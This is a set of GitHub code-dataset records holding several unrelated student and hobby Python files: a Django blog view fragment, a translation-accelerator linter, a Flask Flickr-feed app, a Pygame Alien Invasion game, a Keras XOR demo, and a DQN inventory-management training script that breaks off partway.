request.user:\n return HttpResponseForbidden()\n else:\n post = get_object_or_404(Post, id=post_id)\n\n if request.POST:\n obj = post.delete()\n\n redirect_url = reverse(\"blog:index\")\n return redirect(redirect_url)\n context = {\n \"object\": post,\n }\n return render(request, \"blog/delete_post.html\", context)\n","repo_name":"danilonok/blogSiteDjango","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37481196944","text":"#!/usr/bin/env python3\n\n# Yes, this program *is* overkill.\n# However, it solves all of the following problems:\n# - If a translator accidentally messes up and assigns conflicting accelerators, then users don't have to suffer.\n# - If by random chance two accelerators share a letter, but don't appear together in any dialog, then don't complain.\n# - Nice error reporting if *anything* goes wrong. (Try doing that in /bin/sh!)\n\nfrom collections import defaultdict\nimport sys\nimport os\n\nCONFLICT_PAIRS = [\n ('_OK', '_Cancel'),\n ('_Accept', '_Cancel'),\n ('_Yes', '_No'),\n]\n\nMSGIDS = {e for pair in CONFLICT_PAIRS for e in pair}\n\n\ndef should_ignore_missing(_magic = []):\n envvar = os.environ.get('LINTACCEL_IGNORE_MISSING')\n if envvar is None:\n return False\n if envvar.lower() == 'n' or envvar == '0':\n return False\n if envvar.lower() == 'y' or envvar == '1' or envvar == '':\n return True\n if not _magic:\n print('[WARNING: ambiguous environment variable LINTACCEL_IGNORE_MISSING: \"{}\". Should be one of (unset), empty, \"0\", \"1\", \"y\", \"n\", \"Y\", or \"N\".]'.format(envvar))\n _magic.append(True)\n # Be on the safe side.\n return False\n\n\ndef read_pofile_values(pofile):\n last_msgid = None\n msgid_to_msgstr = dict()\n with open(pofile) as fp:\n for n, line in enumerate(fp.readlines()):\n line = line.rstrip()\n if line.startswith('msgid'):\n if last_msgid is not None:\n print('Duplicate msgid around line {}'.format(n))\n return None\n if not line.startswith('msgid \"') or not line.endswith('\"'):\n print('Weird msgid around line {}'.format(n))\n return None\n last_msgid = line[len('msgid \"'):-len('\"')]\n continue\n if not line.startswith('msgstr'):\n last_msgid = None\n continue\n if last_msgid in MSGIDS:\n if not line.startswith('msgstr \"') or not line.endswith('\"'):\n print('Weird msgstr around line {}'.format(n))\n return None\n msgstr = line[len('msgstr \"'):-len('\"')]\n if last_msgid in msgid_to_msgstr.keys():\n print('Redefinition of msgid {} around line {} (old: \"{}\", new: {})'.format(last_msgid, n, msgid_to_msgstr[last_msgid], msgstr))\n return None\n msgid_to_msgstr[last_msgid] = msgstr\n\n last_msgid = None\n\n return msgid_to_msgstr\n\n\ndef extract_accel(msgstr):\n parts = msgstr.split('_')\n if len(parts) != 2:\n print('msgstr \"{}\" should have exactly one underscore'.format(msgstr))\n return None\n if len(parts[1]) == 0:\n print('msgstr \"{}\" has one underscore, but no accelerator after it?!'.format(msgstr))\n return None\n return parts[1][0]\n\n\ndef check_pofile(pofile):\n msgid_to_msgstr = read_pofile_values(pofile)\n if msgid_to_msgstr is None:\n print('Could not read {}'.format(pofile))\n return 2\n\n missing_msgids = MSGIDS.difference(msgid_to_msgstr.keys())\n if missing_msgids:\n print('Missing translations for {}'.format(missing_msgids))\n if not should_ignore_missing():\n return 2\n else:\n print(' in PO-file {}'.format(pofile))\n\n return_code = 0\n 
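# msgid -> lowercased accelerator letter, used by the conflict check below\n 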
msgid_to_accel = dict()\n for msgid, msgstr in msgid_to_msgstr.items():\n accel = extract_accel(msgstr)\n if accel is None:\n print(' for msgid {}'.format(msgid))\n accel = '_' + msgid # Anything unique to avoid clashes and crashes.\n return_code = 1\n else:\n # Ideally we want to know the same character-to-key mapping that the frontend uses.\n # However, that is not available, and probably impossible. `lower()` has to suffice.\n accel = accel.lower()\n msgid_to_accel[msgid] = accel\n\n for a, b in CONFLICT_PAIRS:\n if a in msgid_to_accel and b in msgid_to_accel and msgid_to_accel[a] == msgid_to_accel[b]:\n return_code = 1\n print('Conflicting accels: \"{}\" ({}) and \"{}\" ({}) both use the key \"{}\", and will appear in the same dialog.'.format(\n msgid_to_msgstr[a], a, msgid_to_msgstr[b], b, msgid_to_accel[b]))\n\n return return_code\n\n\ndef get_relative_path(filename):\n own_dirname = os.path.dirname(__file__)\n return os.path.join(own_dirname, filename)\n\n\ndef run():\n exitcode = 0\n with open(get_relative_path('LINGUAS')) as fp:\n for lang in fp.readlines():\n lang = lang.strip()\n pofile = get_relative_path(lang + '.po')\n if not os.path.exists(pofile):\n exitcode = max(2, exitcode)\n print('PO-file {} does not exist?!'.format(pofile))\n continue\n pofile_code = check_pofile(pofile)\n if pofile_code > 0:\n print(' in PO-file {}'.format(pofile))\n exitcode = max(pofile_code, exitcode)\n return exitcode\n\n\nif __name__ == '__main__':\n exit(run())\n","repo_name":"ars3niy/tdlib-purple","sub_path":"po/lint_accelerators.py","file_name":"lint_accelerators.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"48"} +{"seq_id":"30739335947","text":"#!/usr/bin/python3\n\"\"\"*dos*\nhello.py\n this is precisely the script that had to be written (there you have it, written out), after\n pointing out in class that we already had a script in the repository that managed\n to list photo 'titles' from the public Flickr feed.\n Complete the project. 
What is missing is presenting the results.\n -- this shows whether the introduction we have been doing on\n python and the flask web framework has been useful to you\"\"\"\nfrom flask import Flask, render_template\nfrom lxml import etree\nfrom urllib.request import urlopen\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/person/<name>')\ndef person(name):\n return render_template('person.html',a_name=name)\n\n@app.route('/titulosFotosSevilla')\ndef titFotos():\n _, titulosFotos = findimages()\n return render_template('titFotos.html', titulos=titulosFotos)\n\n@app.route('/FotosSevilla')\ndef imagesFotos():\n imagesFotos = list()\n imagesFotos = findimages()\n return render_template('titFotos.html', arcompleto=imagesFotos)\n\n@app.route('/advices')\ndef advices():\n data = [\n 'Always finish what you started',\n 'Do what you\'re doing your best',\n 'Do not cling to anything that will eventually destroy you'\n ]\n return render_template('advices.html', comments=data)\n\ndef findimages():\n ns={\"Atom\" : \"http://www.w3.org/2005/Atom\"}\n parser=etree.XMLParser()\n tree=etree.parse(urlopen('https://api.flickr.com/services/feeds/photos_public.gne?tags=sevilla'),parser)\n links = tree.xpath(\"//Atom:entry/Atom:link[@rel='enclosure']/@href\", namespaces=ns)\n arNodes = tree.xpath('//Atom:entry/Atom:title', namespaces=ns)\n images = list()\n arTitulos = list()\n arcompleto = (images,arTitulos)\n for link in links:\n images.append(link)\n print(link)\n for node in arNodes:\n arTitulos.append(node.text)\n print(node.text)\n return arcompleto\nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=5003,debug=True)\n\n\n","repo_name":"algonzalvez/IAW","sub_path":"FliPyt.py","file_name":"FliPyt.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8517894237","text":"import sys\n\nfrom time import sleep\n#this helps to pause the game for a moment when the ship is hit\n\nimport pygame\n\n\nfrom settings import Settings #to make instance of setting in the project and access setting\nfrom game_stats import GameStats\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom ship import Ship #to create a ship and call the ship's blitme() method \nfrom bullet import Bullet #\nfrom alien import Alien #\n\n\n\n\nclass AlienInvasition:\n #create a class AlienInvasition to manage game assets and behavior\n \n \n def __init__(self):\n #Initialize the game, and create game resources.\n \n pygame.init() #initialize the background setting\n \n \n self.settings = Settings() #creating instance of Setting \n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.settings.screen_width = self.screen.get_rect().width\n self.settings.screen_height = self.screen.get_rect().height\n '''When creating the screen surface, passing a size of (0, 0) \n and the parameter pygame.FULLSCREEN, this will figure out window size'''\n \n \n #self.screen = pygame.display.set_mode((1200, 800))\n \n \n # pygame.display.set_mode creates display window for the game\n # where games graphical element will be drawn\n self.screen = pygame.display.set_mode(\n (self.settings.screen_width, self.settings.screen_height))\n ## we create a screen and use width and height attributes of self.settings\n \n pygame.display.set_caption(\"Alien Invasion\")\n \n # Create an instance to store game statistics\n self.stats = GameStats(self)\n \n #Create an instance to store game 
statistics,\n #and create a scoreboard.\n self.sb = Scoreboard(self)\n \n self.ship = Ship(self)\n #self argument here is the instance of AlienInvasition and gives access to the game's resources\n \n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group() #creating instance for Alien\n \n self._create_fleet()\n \n ## Make the Play button\n self.play_button = Button(self, \"Play\")\n \n \n \n \n \n def run_game(self):\n \n #start the main loop for the game\n while True:\n self._check_events()\n \n if self.stats.game_active: #parts that should run only when the game is active\n self.ship.update() #the ship's position is updated after checking for keyboard events, before updating the screen\n self._update_bullets()\n self._update_aliens()\n \n self._update_screen() #updating the screen\n \n \n \n def _check_events(self): #simplifying the run_game method\n \n #responding to keypresses and mouse events, i.e. whether the player makes any movements\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n #SHIP MOVEMENT / responding to key press \n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n \n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n \n \n \n def _check_play_button(self, mouse_pos):\n #Start a new game when the player clicks Play.\n \n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n ###if self.play_button.rect.collidepoint(mouse_pos):\n \n \n self.settings.initialize_dynamic_settings()\n # Reset the game statistics.\n self.stats.reset_stats()\n self.stats.game_active = True\n self.sb.prep_score() # after resetting the game stats when starting a new game, the score starts from 0\n self.sb.prep_level()\n self.sb.prep_ships()\n\n \n \n # Get rid of any remaining aliens and bullets.\n self.aliens.empty()\n self.bullets.empty()\n \n # Create a new fleet and center the ship.\n self._create_fleet()\n self.ship.center_ship()\n \n ## Hide the mouse cursor.\n pygame.mouse.set_visible(False)\n \n \n \n def _check_keydown_events(self, event):\n #respond to keypress\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True #set moving_right to true\n #If a KEYDOWN event occurs for the K_RIGHT key, we set moving_right to True.\n \n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n #If a KEYDOWN event occurs for the K_LEFT key, we set moving_left to True.\n \n elif event.key == pygame.K_q: #press q to quit the game\n sys.exit()\n \n elif event.key == pygame.K_SPACE: #call bullet when spacebar is pressed\n self._fire_bullet()\n \n \n \n \n \n def _check_keyup_events(self, event):\n #respond to key releases \n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False #moving right to false\n #If a KEYUP event occurs for the K_RIGHT key, we set moving_right to False. 
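(Ship.update(), called every frame from run_game, keeps moving the ship while the flag stays True.)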
\n \n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n #If a KEYUP event occurs for the K_LEFT key, we set moving_left to False.\n \n #if the right arrow key pressed, move the ship to the right\n #self.ship.rect.x += 1\n \n \n \n def _fire_bullet(self):\n #Create a new bullet and add it to the bullets group.\n \n if len(self.bullets) < self.settings.bullets_allowed:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n \n \n \n \n \n def _update_bullets(self):\n #Update position of bullets and get rid of old bullets.\n # Update bullet positions.\n self.bullets.update() #it will automatically calls update() for each sprite in the group.\n \n #get rid of bullets that have disappeared\n for bullet in self.bullets.copy(): # it enables to modify bullets inside the loop.\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n \n #print(len(self.bullets))\n \n self._check_bullet_alien_collisions()\n \n \n \n \n def _check_bullet_alien_collisions(self):\n #\"Respond to bullet-alien collisions.\n # Remove any bullets and aliens that have collided.\n\n \n # Check for any bullets that have hit aliens.\n # If so, get rid of the bullet and the alien.\n collisions = pygame.sprite.groupcollide(self.bullets, self.aliens, True, True)\n \n if collisions:\n for aliens in collisions.values():\n self.stats.score += self.settings.alien_points * len(aliens) #making sure to score all hits\n #self.stats.score += self.settings.alien_points\n self.sb.prep_score()\n self.sb.check_high_score()\n \n if not self.aliens: #check whether the aliens group is empty\n # Destroy existing bullets and create new fleet.\n self.bullets.empty()\n self._create_fleet()\n \n #increase the game’s tempo by calling increase_speed() \n self.settings.increase_speed()\n \n # Increase level.\n self.stats.level += 1\n self.sb.prep_level()\n \n \n \n\n \n def _update_aliens(self):\n \n #Check if the fleet is at an edge, then update the positions of all aliens in the fleet.\n self._check_fleet_edges()\n #Update the positions of all aliens in the fleet and it calls ecah aline's update method\n self.aliens.update()\n \n # Look for alien-ship collisions.\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n #If no collisions occur, spritecollideany() returns None and the if block \n #will not execute\n self._ship_hit() #print function replaced\n #print(\"Ship hit!!!\")\n #if collided with the ship, it will execute ship \n \n # Look for aliens hitting the bottom of the screen.\n self._check_aliens_bottom() \n \n \n \n \n \n \n def _create_fleet(self):\n #Create the fleet of aliens. 
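Row and column counts are derived from the alien and ship sizes measured below.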
\n \n #make an alien\n alien = Alien(self) #create an alien\n #self.aliens.add(alien)\n \n \n # create an alien and find the number of aliens in a row.\n # spacing between each alien is equal to one alien width\n alien_width, alien_height = alien.rect.size\n # get the alien’s width & height from its rect attribute \n \n available_space_x = self.settings.screen_width - (2 * alien_width)\n # calculate the horizontal space available for aliens \n \n number_aliens_x = available_space_x // (2 * alien_width)\n #calculate the number of aliens that can fit into that space.\n \n \n # Determine the number of rows of aliens that fit on the screen.\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - (3 * alien_height) - ship_height)\n \n \n number_rows = available_space_y // (2 * alien_height)\n \n # Create the full fleet of aliens.\n for row_number in range(number_rows):\n #To create multiple rows, we use two nested loops\n #inner loop creates the aliens in one row and outer loop counts from zero\n \n # Create the first row of aliens.\n # set up a loop that counts from 0 to the number of aliens we need to make\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n \n \n \n \n \n #this defines the alien number that’s currently being created. \n def _create_alien(self, alien_number, row_number):\n #Create an alien and place it in the row.\n \n # Create an alien and place it in the row.\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size \n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n \n\n \n \n \n \n def _check_fleet_edges(self):\n #Respond appropriately if any aliens have reached an edge.\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n break\n \n \n \n \n def _change_fleet_direction(self):\n #Drop the entire fleet and change the fleet's direction.\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1 \n \n \n \n \n \n \n def _ship_hit(self):\n # _ship_hit() coordinates the response when an alien hits a ship\n #Respond to the ship being hit by an alien\n \n if self.stats.ships_left > 0:\n # Decrement ships_left, and update scoreboard. 
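prep_ships() redraws the remaining-ship icons.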
\n self.stats.ships_left -= 1\n #the number of ships left is reduced by 1\n self.sb.prep_ships()\n \n # Get rid of any remaining aliens and bullets after the hit\n self.aliens.empty()\n self.bullets.empty()\n \n # Create a new fleet and center the ship\n self._create_fleet()\n self.ship.center_ship()\n \n # Pause\n sleep(0.5)\n \n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n \n \n \n \n \n def _check_aliens_bottom(self):\n #Check if any aliens have reached the bottom of the screen\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n ## Treat this the same as if the ship got hit.\n self._ship_hit()\n break\n\n \n def _update_screen(self):\n #update image on the screen, and flip to the new screen \n \n self.screen.fill(self.settings.bg_color) \n #self.settings to access background color when filling the screen \n \n self.ship.blitme()\n #calling ship.blitme() to draw the ship on top of the background\n \n \n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n self.aliens.draw(self.screen) \n #To make the alien appear, we need to call the group’s draw() method \n \n # Draw the score information.\n self.sb.show_score()\n \n \n # Draw the play button if the game is inactive.\n if not self.stats.game_active:\n self.play_button.draw_button()\n \n #make the most recently drawn screen visible \n pygame.display.flip()\n \nif __name__ == '__main__':\n ai = AlienInvasition()\n ai.run_game()\n ","repo_name":"HBP1993/Pygame","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":13719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2052347354","text":"def average(array):\r\n array = set(array)\r\n length = len(array)\r\n avg = sum(array)/length\r\n return round(avg,3)\r\n\r\n#THIS COMMENTED-OUT PART WAS FINE, BUT IN THE IF NAME BLOCK THEY PUT WHAT THEY WANTED AS INPUT\r\n# quantity = input(\"\")\r\n# values = []\r\n# numbers = input('')\r\n# for num in [int(n) for n in numbers.split(\" \")]:\r\n# values.append(num)\r\n# array = set(values)\r\n# length = len(array)\r\n\r\n\r\n# def run():\r\n# average(array) \r\n\r\nif __name__ == \"__main__\":\r\n n= int(input())\r\n arr = list(map(int, input().split()))\r\n result = average(arr)\r\n print(result)","repo_name":"Fabriciogg8/python_basics","sub_path":"hackerrank10.py","file_name":"hackerrank10.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17925381062","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\" # or any {'0', '1', '2'}\n\nnp.random.seed(1)\n\nX_xor = np.array([[1, 1], [1, 0], [0, 1], [0, 0]])\ny_xor = np.array([0, 1, 1, 0]) # XOR dataset\n\nX, y, m = X_xor, y_xor, 255\ncov = [[0.01, 0], [0, 0.01]] # covariance matrix of the Gaussian distribution\n\n# sample 255 points from a 2-D Gaussian centred on each of the 4 XOR points\nfor (xx, yy) in zip(X_xor, y_xor):\n x1, x2 = np.random.multivariate_normal(xx, cov, m).T\n X = np.r_[X, np.column_stack((x1, x2))]\n y = np.hstack((y, np.ones(m) * yy))\n\n\nfigure = plt.figure(figsize=(16, 8))\n\nwith plt.style.context('Solarize_Light2'):\n\n x_min, x_max = -0.5, 1.5\n y_min, y_max = -0.5, 1.5\n inc = 0.01\n xx, yy = 
np.meshgrid(np.arange(x_min, x_max, inc), np.arange(y_min, y_max, inc))\n i = 0\n h_array = [2, 3, 4, 5]\n col = len(h_array)\n\n for h in h_array:\n\n model = Sequential()\n model.add(Dense(units=h, activation=\"sigmoid\", input_shape=(2, )))\n model.add(Dense(units=1, activation='sigmoid'))\n model.summary()\n\n model.compile(\n optimizer=Adam(0.1),\n loss=\"binary_crossentropy\",\n metrics=['accuracy']\n )\n\n model.fit(X, y, epochs=10, batch_size=32)\n loss, acc = model.evaluate(X, y, verbose=2)\n\n Z = model.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z[:, 0].reshape(xx.shape)\n\n i += 1\n ax = plt.subplot(2, col, i)\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n\n ax.contourf(xx, yy, Z, alpha=.8)\n # contours = ax.contour(xx, yy, Z, np.arange(-0.1, 1.1, 0.1), alpha=.8)\n # ax.clabel(contours)\n\n ax.scatter(X[:, 0], X[:, 1], s=40, c=y, edgecolors='#002b36')\n # ax.text((xx.min()+xx.max())/2, yy.min()+0.05, (r'$%d$ neurons, acc = %.2f' % (h, acc)).lstrip('0'), size=14, color='#002b36', horizontalalignment='center')\n ax.set_title(r'$%d$ neurons, acc = %.2f' % (h, acc), color='#586e75', size=14)\n\n ax = plt.subplot(2, col, i+col, projection='3d')\n\n ax.plot_surface(xx, yy, Z)\n ax.set_xticks(np.arange(x_min, x_max+0.1, 0.5))\n ax.set_yticks(np.arange(y_min, y_max+0.1, 0.5))\n ax.set_xlabel(r'$x_1$')\n ax.set_ylabel(r'$x_2$')\n\nplt.subplots_adjust(wspace=0.08, hspace=0.08)\nplt.show()\n","repo_name":"Avanti1980/course-ml","sub_path":"python/dnn-xor.py","file_name":"dnn-xor.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"5354680275","text":"import random\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport pandas as pd\r\nfrom network_utils import MLP, LSTM\r\nimport argparse\r\nfrom rlib.algorithms.dqn import DQNAgent\r\nfrom rlib.environments.gym import GymEnvironment\r\nimport gym\r\nimport os\r\nfrom rlib.shared.utils import Logger\r\nimport gym_example\r\n\r\n\r\ndef get_args_parser():\r\n parser = argparse.ArgumentParser('Set transformer detector', add_help=False)\r\n\r\n parser.add_argument('--experiment_name', default='dqn_date_demo', type=str)\r\n parser.add_argument('--num_episodes', default=5000, type=int)\r\n parser.add_argument('--seed', default=5214, type=int)\r\n parser.add_argument('--output_dir', default='output', help='path where to save, empty for no saving')\r\n parser.add_argument('--env', default='stockManager-v2', type=str, choices=('stockManager-v0', 'stockManager-v1', 'stockManager-v2'))\r\n # Training\r\n parser.add_argument('--gamma', default=0.99, type=float)\r\n parser.add_argument('--target_update', default=1000, type=int)\r\n parser.add_argument('--learning_rate', default=2.5e-4, type=float)\r\n parser.add_argument('--train', default=False, type=bool)\r\n parser.add_argument('--test', default=False, type=bool)\r\n parser.add_argument('--sinusoidal_demand', default=False, type=bool)\r\n parser.add_argument('--sine_type', default=3, type=int)\r\n parser.add_argument('--resume', default=False, type=bool)\r\n parser.add_argument('--demand_satisfaction', default=False, type=bool)\r\n parser.add_argument('--past_demand', default=3, type=int)\r\n parser.add_argument('--noisy_demand', default=False, type=bool)\r\n parser.add_argument(\"--hidden_layers\", nargs=\"*\", type=int, default=[256, 128])\r\n parser.add_argument('--demand_embedding', default=3, type=int)\r\n 
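# network width, replay-buffer and update-rule settings follow\r\n    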
parser.add_argument('--hidden_dim_lstm', default=128, type=int)\r\n parser.add_argument('--learn_every', default=4, type=int)\r\n parser.add_argument('--batch_size', default=32, type=int)\r\n parser.add_argument('--buffer_size', default=int(1e7), type=int)\r\n parser.add_argument('--tau', default=1e-3, type=float)\r\n parser.add_argument('--opt_soft_update', default=False, type=bool)\r\n parser.add_argument('--opt_ddqn', default=False, type=bool)\r\n parser.add_argument(\"--cuda_visible_device\", nargs=\"*\", type=int, default=None,\r\n help=\"list of cuda visible devices\")\r\n parser.add_argument('--inventory_weight', default=1, type=int)\r\n parser.add_argument('--stock_out_weight', default=1, type=int)\r\n parser.add_argument('--hack_test', default=False, type=bool)\r\n parser.add_argument('--hack_train', default=False, type=bool)\r\n parser.add_argument('--evaluate_train', default=False, type=bool)\r\n parser.add_argument('--material_name', default='Q115', type=str, choices= ['B120BP', 'B120', 'Q120', 'TA2J6500', 'Q115', 'Q2100H', 'Q3015'])\r\n\r\n return parser\r\n\r\n\r\nclass PolicyNetwork(nn.Module):\r\n def __init__(self, n_materials=1, past_stock=5, n_actions=2,\r\n hidden_dim_lstm=128, hidden_layers_mlp=[64, 32, 16], demand_embedding=3,\r\n device='cpu'):\r\n super(PolicyNetwork, self).__init__()\r\n self.n_materials = n_materials\r\n self.past_stock = past_stock\r\n self.device = device # torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.lstm_demand = LSTM(n_materials, hidden_dim_lstm, demand_embedding, 2, True).to(self.device)\r\n self.lstm_stock = LSTM(n_materials, hidden_dim_lstm, demand_embedding, 2, True).to(self.device)\r\n self.mlp = MLP(2*demand_embedding + 3, n_actions, hidden_layers_mlp,\r\n activation=\"leakyRelu\", batch_norm=False).to(self.device)\r\n\r\n def forward(self, state):\r\n seq_stock, seq_demand = state[:, :, :self.past_stock], state[:, :, self.past_stock+1:]\r\n static_stock, static_demand, static_date = state[:, :, self.past_stock-1], state[:, :, -1], state[:, :, self.past_stock]\r\n encoder_stock = self.lstm_stock(seq_stock.reshape(seq_stock.shape[0], -1, self.n_materials))\r\n encoder_demand = self.lstm_demand(seq_demand.reshape(seq_demand.shape[0], -1, self.n_materials))\r\n hidden_features = torch.cat((encoder_stock, encoder_demand, static_stock, static_demand, static_date), dim=1)\r\n x = self.mlp(hidden_features)\r\n return x\r\n\r\nclass CustomGymEnvironment(GymEnvironment):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def start_env(self) -> None:\r\n \"\"\"Override Helper to start an environment.\"\"\"\r\n # self.env = gym.make(self._env_name, **kwargs)\r\n self.env.seed(self.seed)\r\n\r\n\r\nclass CustomDQNAgent(DQNAgent):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def save_state_dicts(self):\r\n \"\"\"Override Save state dicts to file.\"\"\"\r\n if not self.model_output_dir:\r\n return\r\n\r\n for sd in self.state_dicts:\r\n torch.save(\r\n sd[0].state_dict(),\r\n os.path.join(self.model_output_dir, \"{}.pth\".format(sd[1]))\r\n )\r\n\r\n def load_state_dicts(self):\r\n \"\"\"Override Load state dicts from file.\"\"\"\r\n if not self.model_output_dir:\r\n raise Exception(\"You must provide an input directory to load state dict.\")\r\n\r\n for sd in self.state_dicts:\r\n sd[0].load_state_dict(\r\n torch.load(os.path.join(self.model_output_dir, \"{}.pth\".format(sd[1])))\r\n )\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser('DETR training 
and evaluation script',\r\n parents=[get_args_parser()])\r\n args = parser.parse_args()\r\n print(args)\r\n if args.cuda_visible_device is not None:\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(map(str, args.cuda_visible_device))\r\n\r\n output_dir = output_dir_logger = args.output_dir + '/' + args.experiment_name\r\n if args.test and not args.train:\r\n name = '_hack_test' if args.hack_test else '_test'\r\n if args.evaluate_train:\r\n name = name + '_evaluate_train'\r\n output_dir_logger = output_dir_logger+name\r\n os.makedirs(args.output_dir, exist_ok=True)\r\n\r\n np.random.seed(args.seed)\r\n random.seed(args.seed)\r\n\r\n mat_info = pd.read_csv(\"Data/Material_Information.csv\", sep=\";\", index_col=\"Material\")\r\n mat_info = mat_info.loc[[args.material_name]]\r\n hist_data = pd.read_csv(\"Data/Preprocessing/train.csv\")\r\n hist_data = hist_data[[args.material_name]]\r\n\r\n logger = Logger(path=output_dir_logger, comment=None, verbosity='DEBUG',\r\n experiment_name=args.experiment_name)\r\n\r\n config = {'hist_data': hist_data,\r\n 'mat_info': mat_info,\r\n 'random_reset': False,\r\n 'sinusoidal_demand': args.sinusoidal_demand,\r\n 'demand_satisfaction': args.demand_satisfaction,\r\n 'past_demand': args.past_demand,\r\n 'sine_type': args.sine_type,\r\n 'noisy_demand': args.noisy_demand,\r\n 'logger': logger,\r\n 'inventory_weight': args.inventory_weight,\r\n 'stock_out_weight': args.stock_out_weight,\r\n 'hack_train': args.hack_train,\r\n 'past_stock': args.past_demand,\r\n 'start_date_string': '2015-01-05'\r\n }\r\n if args.env == 'stockManager-v0':\r\n config.pop('inventory_weight', None)\r\n config.pop('stock_out_weight', None)\r\n config.pop('hack_train', None)\r\n env = gym.make(args.env, **config)\r\n\r\n test_data = pd.read_csv(\"Data/Preprocessing/test.csv\")\r\n test_data = test_data[[args.material_name]]\r\n test_config = {'hist_data': hist_data if args.evaluate_train else test_data,\r\n 'mat_info': mat_info,\r\n 'random_reset': False,\r\n 'sinusoidal_demand': args.sinusoidal_demand,\r\n 'demand_satisfaction': args.demand_satisfaction,\r\n 'past_demand': args.past_demand,\r\n 'sine_type': args.sine_type,\r\n 'noisy_demand': args.noisy_demand,\r\n 'test': True,\r\n 'logger': logger,\r\n 'hack_test': args.hack_test,\r\n 'past_stock': args.past_demand,\r\n 'start_date_string': '2019-11-04'\r\n }\r\n if args.env == 'stockManager-v0':\r\n test_config.pop('hack_test', None)\r\n test_env = gym.make(args.env, **test_config)\r\n\r\n # if gpu is to be used\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(f'device:{device}')\r\n # Get number of actions from gym action space\r\n # n_actions = env.action_space.n\r\n\r\n n_materials = 1\r\n\r\n policy_net = PolicyNetwork(n_materials=n_materials,\r\n past_stock=args.past_demand,\r\n n_actions=2,\r\n hidden_dim_lstm=args.hidden_dim_lstm,\r\n hidden_layers_mlp=args.hidden_layers,\r\n demand_embedding=args.demand_embedding,\r\n device=device)\r\n\r\n target_net = PolicyNetwork(n_materials=n_materials,\r\n past_stock=args.past_demand,\r\n n_actions=2,\r\n hidden_dim_lstm=args.hidden_dim_lstm,\r\n hidden_layers_mlp=args.hidden_layers,\r\n demand_embedding=args.demand_embedding,\r\n device=device)\r\n\r\n target_net.load_state_dict(policy_net.state_dict())\r\n\r\n new_hyperparameters = {\r\n \"buffer_size\": args.buffer_size,\r\n \"batch_size\": args.batch_size,\r\n \"gamma\": args.gamma,\r\n \"learning_rate\": args.learning_rate,\r\n \"tau\": args.tau,\r\n \"learn_every\": args.learn_every,\r\n 
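# steps between hard copies of the online net into the target net\r\n        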
